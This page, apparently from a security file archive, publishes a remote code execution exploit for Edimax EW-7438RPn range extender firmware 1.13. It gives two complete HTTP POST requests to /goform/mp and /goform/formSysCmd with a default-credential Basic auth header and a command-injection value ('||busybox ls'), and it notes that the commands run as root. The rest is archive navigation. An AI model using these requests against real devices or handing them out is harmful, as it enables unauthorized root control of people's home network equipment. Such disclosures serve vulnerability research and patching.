Edimax EW-7438RPn 1.13 Remote Code Execution

Edimax EW-7438RPn 1.13 Remote Code Execution: Posted Apr 24, 2020; Authored by Besim Altinok; Edimax EW-7438RPn version 1.13 suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; SHA-256 | 509213c937fc32c56ee29c0bc1db6b5c0727a2aa493a45f8fdbcbfc6bcd2ec8d; Download | Favorite | View

Edimax EW-7438RPn 1.13 Remote Code Execution

# Exploit Title: Edimax EW-7438RPn 1.13 - Remote Code Execution
# Date: 2020-04-23
# Exploit Author: Besim ALTINOK
# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
# Version:1.13
# Tested on: Edimax EW-7438RPn 1.13 Version

------

NOTE: This device configurated with root permissions. So you can run the
command as root

Here is the detail(s) of the RCE(s)

1- Content of the mp.asp file

<form action="/goform/mp" method="POST" name="mp">
  <input type="text" name="command" value="">&nbsp;<input
type="submit" value="GO">
  <input type="hidden" name="getID" value="">&nbsp;
  <input type="hidden" name="getID" value="">&nbsp;
</form>

RCE Detail:
-------------------------------

POST /goform/mp HTTP/1.1
Host: 192.168.2.2
User-Agent: Mozilla/5.0 *********************
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
DNT: 1
Authorization: Basic YWRtaW46MTIzNA==
Connection: close
Cookie: language=1
Upgrade-Insecure-Requests: 1

command=||busybox+ls&getID=

-------------------------------

2- Content of the syscmd.asp

<form action=/goform/formSysCmd method=POST name="formSysCmd"><table
border=0 width="500" cellspacing=0 cellpadding=0>
<tr><font size=2>
This page can be used to run target system command.</tr>
<tr><hr size=1 noshade align=top></tr>
<tr>  <td>System Command: </td>
  <td><input type="text" name="sysCmd" value="" size="20" maxlength="50"></td>
  <td> <input type="submit" value="Apply" name="apply" onClick='return
saveClick()'></td></form>


RCE Detail:
-------------------------------

POST /goform/formSysCmd HTTP/1.1
Host: 192.168.2.2
User-Agent: Mozilla/5.0 *********************
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
DNT: 1
Authorization: Basic YWRtaW46MTIzNA==
Connection: close
Cookie: language=1
Upgrade-Insecure-Requests: 1

sysCmd="command to here"

Top Authors In Last 30 Days

Red Hat 248 files
Ubuntu 91 files
indoushka 58 files
Jasper Nota 25 files
Willem Westerhof 19 files
Gentoo 13 files
Debian 13 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,087)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,536)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,612)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,441)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,727)
UNIX (9,433)
UnixWare (187)
Windows (6,668)
Other

Edimax EW-7438RPn 1.13 Remote Code Execution

Edimax EW-7438RPn 1.13 Remote Code Execution

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Edimax EW-7438RPn 1.13 Remote Code Execution

Share This

Edimax EW-7438RPn 1.13 Remote Code Execution

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems